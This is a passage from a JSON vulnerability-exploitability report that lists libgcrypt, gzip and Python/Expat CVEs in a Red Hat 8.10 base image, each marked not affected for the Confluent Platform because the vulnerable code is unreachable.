      "description": "Libgcrypt before 1.12.2 sometimes allows a heap-based buffer overflow and denial of service via crafted ECDH ciphertext to gcry_pk_decrypt.",
      "recommendation": "Upgrade libgcrypt to version 1.8.5-8.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41989"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50144"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50147"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41989"
        },
        {
          "url": "https://bugzilla.redhat.com/2461063"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461063"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-019113.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-41989"
        },
        {
          "url": "https://dev.gnupg.org/T8211"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-50144.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:50147"
        },
        {
          "url": "https://github.com/advisories/GHSA-wrv8-79m2-qg24"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-41989.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50147-0.html"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41989"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8319-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41989"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1"
        }
      ],
      "published": "2026-04-23T05:16:05+00:00",
      "updated": "2026-07-14T13:18:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.8.5-7.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41990",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Libgcrypt before 1.12.2 mishandles Dilithium signing. Writes to a static array lack a bounds check but do not use attacker-controlled data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41990"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41990"
        },
        {
          "url": "https://dev.gnupg.org/T8208"
        },
        {
          "url": "https://github.com/advisories/GHSA-78pv-qq8x-94px"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41990"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8319-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41990"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1"
        }
      ],
      "published": "2026-04-23T05:16:05+00:00",
      "updated": "2026-06-17T10:47:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.8.5-7.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41991",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        377
      ],
      "description": "GNU gzip contains a vulnerability in the gzexe utility related to insecure temporary file handling. When the mktemp utility is not available in the user\u2019s PATH, gzexe falls back to constructing a temporary file path based solely on the process ID (PID). This predictable filename is created without exclusive access or existence checks.\nA local attacker can pre\u2011create the predicted temporary file path as a symbolic link pointing to an arbitrary file writable by the victim. When gzexe runs, it follows the symlink and overwrites the target file, resulting in a time\u2011of\u2011check to time\u2011of\u2011use (TOCTOU) condition that allows arbitrary file overwrite.\n\nThis issue has been fixed in the commit 4e6f8b24ab823146ab8776f0b7fe486ab34d4269",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41991"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41991"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-41991"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-41991/"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/gzip.git/commit/?id=4e6f8b24ab823146ab8776f0b7fe486ab34d4269"
        },
        {
          "url": "https://github.com/advisories/GHSA-67v8-88jf-4x6q"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41991"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8512-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41991"
        },
        {
          "url": "https://www.gnu.org/software/gzip"
        },
        {
          "url": "https://www.gnu.org/software/gzip/"
        }
      ],
      "published": "2026-06-29T12:16:29+00:00",
      "updated": "2026-07-01T14:02:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.9-13.el8_5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4224",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "When an Expat parser with a registered ElementDeclHandler parses an inline\ndocument type definition containing a deeply nested content model a C stack\noverflow occurs.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4224"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/16/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4224"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/196edfb06a7458377d4d0f4b3cd41724c1f3bd4a"
        },
        {
          "url": "https://github.com/python/cpython/commit/24ce88b285f56ee11626cf5e472af3cd8cc7c621"
        },
        {
          "url": "https://github.com/python/cpython/commit/642865ddf4b232da1f3b1f7abcfa3254c4bfe785"
        },
        {
          "url": "https://github.com/python/cpython/commit/af856a7177326ac25d9f66cc6dd28b554d914fee"
        },
        {
          "url": "https://github.com/python/cpython/commit/e0a8a6da90597a924b300debe045cdb4628ee1f3"
        },
        {
          "url": "https://github.com/python/cpython/commit/eb0e8be3a7e11b87d198a2c3af1ed0eccf532768"
        },
        {
          "url": "https://github.com/python/cpython/issues/145986"
        },
        {
          "url": "https://github.com/python/cpython/pull/145987"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4224.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/5M7CGUW3XBRY7II4DK43KF7NQQ3TPZ6R/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4224"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4224"
        }
      ],
      "published": "2026-03-16T18:16:10+00:00",
      "updated": "2026-08-13T01:16:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
